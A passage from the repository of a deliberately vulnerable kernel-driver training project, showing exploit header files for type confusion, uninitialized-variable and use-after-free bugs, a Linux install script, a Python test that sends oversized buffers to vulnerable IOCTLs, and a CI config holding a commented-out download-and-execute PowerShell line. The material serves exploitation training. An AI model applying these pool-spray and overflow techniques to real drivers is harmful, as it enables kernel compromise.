32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | TypeConfusion.h
44 |
45 | Abstract:
46 | This module implements the data structures used by the
47 | exploit for Type Confusion Vulnerability implemented in
48 | HackSys Extreme Vulnerable Driver.
49 |
50 | --*/
51 |
52 | #ifndef __TYPE_CONFUSION_H__
53 | #define __TYPE_CONFUSION_H__
54 |
55 | #pragma once
56 |
57 | #include "Common.h"
58 |
59 | typedef struct _USER_TYPE_CONFUSION_OBJECT {
60 | ULONG_PTR objectID;
61 | ULONG_PTR objectType;
62 | } USER_TYPE_CONFUSION_OBJECT, *PUSER_TYPE_CONFUSION_OBJECT;
63 |
64 | DWORD WINAPI TypeConfusionThread(LPVOID Parameter);
65 |
66 | #endif //__TYPE_CONFUSION_H__
67 |
--------------------------------------------------------------------------------
/Exploit/UninitializedHeapVariable.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | UninitializedHeapVariable.h
44 |
45 | Abstract:
46 | This module implements the data structures used by the
47 | exploit for Uninitialized Heap Variable Vulnerability
48 | implemented in HackSys Extreme Vulnerable Driver.
49 |
50 | --*/
51 |
52 | #ifndef __UNINITIALIZED_HEAP_VARIABLE_H__
53 | #define __UNINITIALIZED_HEAP_VARIABLE_H__
54 |
55 | #pragma once
56 |
57 | #include "Common.h"
58 |
59 | #define MAX_OBJECT_NAME_LENGTH 0xF0
60 | #define MAX_CHUNKS_IN_LAL_BUCKET 256
61 | #define UNICODE_TERMINATOR_LENGTH 0x4
62 |
63 | VOID WaitForLookAsideListActivation();
64 | VOID PopulateLookAsideList(PVOID Payload);
65 | DWORD WINAPI UninitializedHeapVariableThread(LPVOID Parameter);
66 | VOID GenerateObjectNameWithPayloadTrampoline(UCHAR Name[], UINT32 Length, ULONG_PTR Pivot);
67 |
68 | #endif //__UNINITIALIZED_HEAP_VARIABLE_H__
69 |
--------------------------------------------------------------------------------
/Exploit/UninitializedStackVariable.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | UninitializedStackVariable.h
44 |
45 | Abstract:
46 | This module implements the data structures used by the
47 | exploit for Uninitialized Stack Variable Vulnerability
48 | implemented in HackSys Extreme Vulnerable Driver.
49 |
50 | --*/
51 |
52 | #ifndef __UNINITIALIZED_STACK_VARIABLE_H__
53 | #define __UNINITIALIZED_STACK_VARIABLE_H__
54 |
55 | #pragma once
56 |
57 | #include "Common.h"
58 |
59 | DWORD WINAPI UninitializedStackVariableThread(LPVOID Parameter);
60 |
61 | #endif //__UNINITIALIZED_STACK_VARIABLE_H__
62 |
--------------------------------------------------------------------------------
/Exploit/UseAfterFree.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | UseAfterFree.h
44 |
45 | Abstract:
46 | This module implements the data structures used by the
47 | exploit for Use After Free Vulnerability implemented in
48 | HackSys Extreme Vulnerable Driver.
49 |
50 | --*/
51 |
52 | #ifndef __USE_AFTER_FREE_H__
53 | #define __USE_AFTER_FREE_H__
54 |
55 | #pragma once
56 |
57 | #include "Common.h"
58 |
59 | #define IO_COMPLETION_OBJECT 1
60 |
61 | typedef struct _FAKE_OBJECT {
62 | CHAR buffer[0x58];
63 | } FAKE_OBJECT, *PFAKE_OBJECT;
64 |
65 | HANDLE ReserveObjectArrayA[10000];
66 | HANDLE ReserveObjectArrayB[5000];
67 |
68 | VOID FreeReserveObjects();
69 | VOID SprayNonPagedPoolWithReserveObjects();
70 | DWORD WINAPI UseAfterFreeThread(LPVOID Parameter);
71 | VOID CreateHolesInNonPagedPoolByClosingReserveObjects();
72 |
73 | #endif //__USE_AFTER_FREE_H__
74 |
--------------------------------------------------------------------------------
/Exploit/arg.h:
--------------------------------------------------------------------------------
1 | #ifndef __ARG_H__
2 | #define __ARG_H__
3 |
4 | extern char *argv0;
5 |
6 | #define USED(x) ((void)(x))
7 |
8 | #define ARGBEGIN for (argv0 = *argv, argv++, argc--;\
9 | argv[0] && argv[0][1]\
10 | && argv[0][0] == '-';\
11 | argc--, argv++) {\
12 | char _argc;\
13 | char **_argv;\
14 | int brk;\
15 | if (argv[0][1] == '-' && argv[0][2] == '\0') {\
16 | argv++;\
17 | argc--;\
18 | break;\
19 | }\
20 | for (brk = 0, argv[0]++, _argv = argv;\
21 | argv[0][0] && !brk;\
22 | argv[0]++) {\
23 | if (_argv != argv)\
24 | break;\
25 | _argc = argv[0][0];\
26 | switch (_argc)
27 |
28 | #define ARGEND }\
29 | USED(_argc);\
30 | }\
31 | USED(argv);\
32 | USED(argc);
33 |
34 | #define ARGC() _argc
35 |
36 | #define EARGF(x) ((argv[0][1] == '\0' && argv[1] == NULL)?\
37 | ((x), abort(), (char *)0) :\
38 | (brk = 1, (argv[0][1] != '\0')?\
39 | (&argv[0][1]) :\
40 | (argc--, argv++, argv[0])))
41 |
42 | #define ARGF() ((argv[0][1] == '\0' && argv[1] == NULL)?\
43 | (char *)0 :\
44 | (brk = 1, (argv[0][1] != '\0')?\
45 | (&argv[0][1]) :\
46 | (argc--, argv++, argv[0])))
47 |
48 | #endif //__ARG_H__
49 |
--------------------------------------------------------------------------------
/Screenshots/hevd-banner.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hacksysteam/HackSysExtremeVulnerableDriver/b1cc756e55f69530f6468a6c3c310ed7b967bada/Screenshots/hevd-banner.png
--------------------------------------------------------------------------------
/Screenshots/hevd-debug-print.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hacksysteam/HackSysExtremeVulnerableDriver/b1cc756e55f69530f6468a6c3c310ed7b967bada/Screenshots/hevd-debug-print.png
--------------------------------------------------------------------------------
/Screenshots/hevd-exploitation.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hacksysteam/HackSysExtremeVulnerableDriver/b1cc756e55f69530f6468a6c3c310ed7b967bada/Screenshots/hevd-exploitation.png
--------------------------------------------------------------------------------
/Screenshots/hevd-help.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hacksysteam/HackSysExtremeVulnerableDriver/b1cc756e55f69530f6468a6c3c310ed7b967bada/Screenshots/hevd-help.png
--------------------------------------------------------------------------------
/Screenshots/hevd-linux-banner.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hacksysteam/HackSysExtremeVulnerableDriver/b1cc756e55f69530f6468a6c3c310ed7b967bada/Screenshots/hevd-linux-banner.png
--------------------------------------------------------------------------------
/Screenshots/hevd-linux-install-uninstall.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hacksysteam/HackSysExtremeVulnerableDriver/b1cc756e55f69530f6468a6c3c310ed7b967bada/Screenshots/hevd-linux-install-uninstall.png
--------------------------------------------------------------------------------
/Screenshots/hevd-linux-ioctl-log.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hacksysteam/HackSysExtremeVulnerableDriver/b1cc756e55f69530f6468a6c3c310ed7b967bada/Screenshots/hevd-linux-ioctl-log.png
--------------------------------------------------------------------------------
/Screenshots/hevd-linux-ioctl-tests.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hacksysteam/HackSysExtremeVulnerableDriver/b1cc756e55f69530f6468a6c3c310ed7b967bada/Screenshots/hevd-linux-ioctl-tests.png
--------------------------------------------------------------------------------
/Tools/hevd_linux_installer.sh:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env bash
2 |
3 | if [ "$#" -ne 1 ]; then
4 | echo "❗ Usage: $0 {install|uninstall}"
5 | exit 1
6 | fi
7 |
8 | CURRENT_DIR=${PWD}
9 | BUILD_ARCH=x64
10 | PROJECT_NAME=hevd
11 | PROJECT_ROOT="$(readlink -f ${CURRENT_DIR}/../)"
12 | BUILD_DIR="${PROJECT_ROOT}/build/driver/linux/vulnerable/${BUILD_ARCH}"
13 | MODULE_PATH="${BUILD_DIR}/${PROJECT_NAME}.ko"
14 | HEVD_DEVICE_PATH="/dev/HackSysExtremeVulnerableDriver"
15 |
16 | # Run this script as root
17 | if [ "$(id -u)" != "0" ]; then
18 | echo "🚫 This script must be run as root"
19 | exit 1
20 | fi
21 |
22 | if [ ! -f "${MODULE_PATH}" ]; then
23 | echo "🔍 Kernel module not found: ${MODULE_PATH}"
24 | exit 1
25 | fi
26 |
27 | case "$1" in
28 | install)
29 | # Load the kernel module
30 | insmod "${MODULE_PATH}"
31 |
32 | if [ $? -eq 0 ]; then
33 | echo "✅ Kernel module loaded successfully"
34 |
35 | # Change the permissions of the device file
36 | sleep 1
37 | chmod a+rw "${HEVD_DEVICE_PATH}"
38 | echo "🔒 Permissions updated: ${HEVD_DEVICE_PATH}"
39 | else
40 | echo "❌ Failed to load kernel module: ${MODULE_PATH}"
41 | exit 1
42 | fi
43 | ;;
44 | uninstall|remove)
45 | # Unload the kernel module
46 | rmmod "${PROJECT_NAME}"
47 |
48 | if [ $? -eq 0 ]; then
49 | echo "✅ Kernel module unloaded successfully"
50 | else
51 | echo "❌ Failed to unload kernel module: ${PROJECT_NAME}"
52 | exit 1
53 | fi
54 | ;;
55 | *)
56 | echo "❗ Invalid option: $1"
57 | echo "❗ Usage: $0 {install|uninstall}"
58 | exit 1
59 | ;;
60 | esac
61 |
--------------------------------------------------------------------------------
/Tools/hevd_linux_tests.py:
--------------------------------------------------------------------------------
1 | import ctypes
2 | import fcntl
3 | import os
4 |
5 |
6 | IOCPARM_MASK = 0x1fff
7 | IOC_OUT = 0x40000000
8 | IOC_IN = 0x80000000
9 | IOC_INOUT = IOC_IN | IOC_OUT
10 |
11 |
12 | def _IOC(inout, group, number, len):
13 | return (inout | ((len & IOCPARM_MASK) << 16) | ((group) << 8) | (number))
14 |
15 | def _IOWR(group, number, type):
16 | return _IOC(IOC_INOUT, ord(group), number, ctypes.sizeof(type))
17 |
18 |
19 | class HEVD_IO(ctypes.Structure):
20 | _fields_ = [
21 | ("input_buffer", ctypes.c_void_p),
22 | ("input_buffer_length", ctypes.c_size_t),
23 | ("output_buffer", ctypes.c_void_p),
24 | ("output_buffer_length", ctypes.c_size_t),
25 | ]
26 |
27 |
28 | def IOCTL(number):
29 | return _IOWR('h', number, HEVD_IO)
30 |
31 |
32 | DEVICE_PATH = "/dev/HackSysExtremeVulnerableDriver"
33 |
34 | # IOCTL codes
35 | HEVD_IOCTL_BUFFER_OVERFLOW_STACK = IOCTL(0)
36 | # HEVD_IOCTL_BUFFER_OVERFLOW_STACK_GS = IOCTL(1)
37 | # HEVD_IOCTL_ARBITRARY_WRITE = IOCTL(2)
38 | # HEVD_IOCTL_BUFFER_OVERFLOW_KERNEL_HEAP = IOCTL(3)
39 | # HEVD_IOCTL_ALLOCATE_UAF_OBJECT_KERNEL_HEAP = IOCTL(4)
40 | # HEVD_IOCTL_USE_UAF_OBJECT_KERNEL_HEAP = IOCTL(5)
41 | # HEVD_IOCTL_FREE_UAF_OBJECT_KERNEL_HEAP = IOCTL(6)
42 | # HEVD_IOCTL_ALLOCATE_FAKE_OBJECT_KERNEL_HEAP = IOCTL(7)
43 | # HEVD_IOCTL_TYPE_CONFUSION = IOCTL(8)
44 | HEVD_IOCTL_INTEGER_OVERFLOW = IOCTL(9)
45 | # HEVD_IOCTL_NULL_POINTER_DEREFERENCE = IOCTL(0xA)
46 | # HEVD_IOCTL_UNINITIALIZED_MEMORY_STACK = IOCTL(0xB)
47 | # HEVD_IOCTL_UNINITIALIZED_MEMORY_KERNEL_HEAP = IOCTL(0xC)
48 | # HEVD_IOCTL_DOUBLE_FETCH = IOCTL(0xD)
49 |
50 |
51 | def trigger_ioctl(ioctl, hevd_io):
52 | device_fd = os.open(DEVICE_PATH, os.O_RDWR)
53 |
54 | try:
55 | status = fcntl.ioctl(device_fd, ioctl, hevd_io)
56 | except Exception as exc:
57 | print(f"💥 Exception in IOCTL: {exc}")
58 | return
59 |
60 | if status == 0:
61 | print("✅ IOCTL executed successfully!")
62 | else:
63 | print(f"❌ Failed to execute IOCTL. Status code: {status}")
64 |
65 | os.close(device_fd)
66 |
67 |
68 | if __name__ == "__main__":
69 | print(f"🏆 HackSys Extreme Vulnerable Driver (HEVD) - Linux 🏆")
70 |
71 | # Tests for each IOCTL
72 | print()
73 | print(f"🚀 Triggering: HEVD_IOCTL_BUFFER_OVERFLOW_STACK - 0x{HEVD_IOCTL_BUFFER_OVERFLOW_STACK:X}")
74 |
75 | input_buffer_size = 0x1000
76 | input_buffer_data = b"A" * input_buffer_size
77 | input_buffer = ctypes.create_string_buffer(input_buffer_data)
78 |
79 | user_hevd_io = HEVD_IO()
80 | user_hevd_io.input_buffer = ctypes.cast(input_buffer, ctypes.c_void_p)
81 | user_hevd_io.input_buffer_length = len(input_buffer_data)
82 |
83 | print(f"\t🔵 Input buffer: 0x{ctypes.addressof(input_buffer):X}")
84 | print(f"\t🔵 Input buffer length: 0x{input_buffer_size:X}")
85 |
86 | trigger_ioctl(HEVD_IOCTL_BUFFER_OVERFLOW_STACK, user_hevd_io)
87 |
88 | print()
89 | print(f"🚀 Triggering: HEVD_IOCTL_INTEGER_OVERFLOW - 0x{HEVD_IOCTL_INTEGER_OVERFLOW:X}")
90 |
91 | input_buffer_size = 0x800
92 | input_buffer_data = b"A" * input_buffer_size
93 | input_buffer = ctypes.create_string_buffer(input_buffer_data)
94 |
95 | user_hevd_io = HEVD_IO()
96 | user_hevd_io.input_buffer = ctypes.cast(input_buffer, ctypes.c_void_p)
97 | user_hevd_io.input_buffer_length = len(input_buffer_data)
98 |
99 | print(f"\t🔵 Input buffer: 0x{ctypes.addressof(input_buffer):X}")
100 | print(f"\t🔵 Input buffer length: 0x{input_buffer_size:X}")
101 |
102 | trigger_ioctl(HEVD_IOCTL_INTEGER_OVERFLOW, user_hevd_io)
103 |
--------------------------------------------------------------------------------
/Whitepaper/HackSys Extreme Vulnerable Driver.pptx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hacksysteam/HackSysExtremeVulnerableDriver/b1cc756e55f69530f6468a6c3c310ed7b967bada/Whitepaper/HackSys Extreme Vulnerable Driver.pptx
--------------------------------------------------------------------------------
/Whitepaper/HackSys_Extreme_Vulnerable_Driver_Whitepaper.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hacksysteam/HackSysExtremeVulnerableDriver/b1cc756e55f69530f6468a6c3c310ed7b967bada/Whitepaper/HackSys_Extreme_Vulnerable_Driver_Whitepaper.pdf
--------------------------------------------------------------------------------
/appveyor.yml:
--------------------------------------------------------------------------------
1 | # HEVD appveyor configuration
2 |
3 | #---------------------------------#
4 | # general configuration #
5 | #---------------------------------#
6 |
7 | # version format
8 | version: 3.0.{build}
9 |
10 | # branches to build
11 | branches:
12 | # whitelist
13 | only:
14 | - master
15 |
16 | # Do not build on tags (GitHub and BitBucket)
17 | skip_tags: true
18 |
19 | # Do not build feature branch with open Pull Requests
20 | # skip_branch_with_pr: true
21 |
22 | # Maximum number of concurrent jobs for the project
23 | max_jobs: 1
24 |
25 | #---------------------------------#
26 | # environment configuration #
27 | #---------------------------------#
28 |
29 | # Build worker image (VM template)
30 | image:
31 | - Visual Studio 2017
32 | - Ubuntu
33 |
34 | # fetch repository as zip archive
35 | # default is "false"
36 | shallow_clone: true
37 |
38 | # set clone depth
39 | # clone entire repository history if not defined
40 | clone_depth: 1
41 |
42 | # this is how to allow failing jobs in the matrix
43 | # environment:
44 | # matrix:
45 | # - job_name: Build HEVD for Windows
46 | # - job_name: Build HEVD for Linux
47 | # job_depends_on: Build HEVD for Windows
48 | # - job_name: Package HEVD
49 | # job_depends_on: Build HEVD for Linux
50 |
51 | matrix:
52 | fast_finish: true
53 |
54 | for:
55 | - matrix:
56 | only:
57 | - image: Visual Studio 2017
58 | clone_folder: c:\projects\hevd
59 | build_script:
60 | - cmd: cd c:\projects\hevd\Builder
61 | - cmd: Build_HEVD_All.bat
62 | after_build:
63 | - cmd: 7z a c:\projects\hevd\HEVD.zip c:\projects\hevd\build\*
64 |
65 | - matrix:
66 | only:
67 | - image: Ubuntu
68 | clone_folder: /home/appveyor/projects/hevd
69 | build_script:
70 | - sh: cd /home/appveyor/projects/hevd/Builder
71 | - sh: sh Build_HEVD_All.sh
72 | after_build:
73 | - sh: 7z a /home/appveyor/projects/hevd/HEVD.zip /home/appveyor/projects/hevd/build/*
74 |
75 | # disable test
76 | test: off
77 |
78 | # artifacts
79 | artifacts:
80 | - path: HEVD.zip
81 |
82 | # disable deployment
83 | deploy: off
84 |
85 |
86 | # remote desktop debugging
87 | # environment:
88 | # APPVEYOR_RDP_PASSWORD: Passw0rd!
89 |
90 | # on_finish:
91 | # - ps: $blockRdp = $true; iex ((new-object net.webclient).DownloadString('https://raw.githubusercontent.com/appveyor/ci/master/scripts/enable-rdp.ps1'))
92 |
--------------------------------------------------------------------------------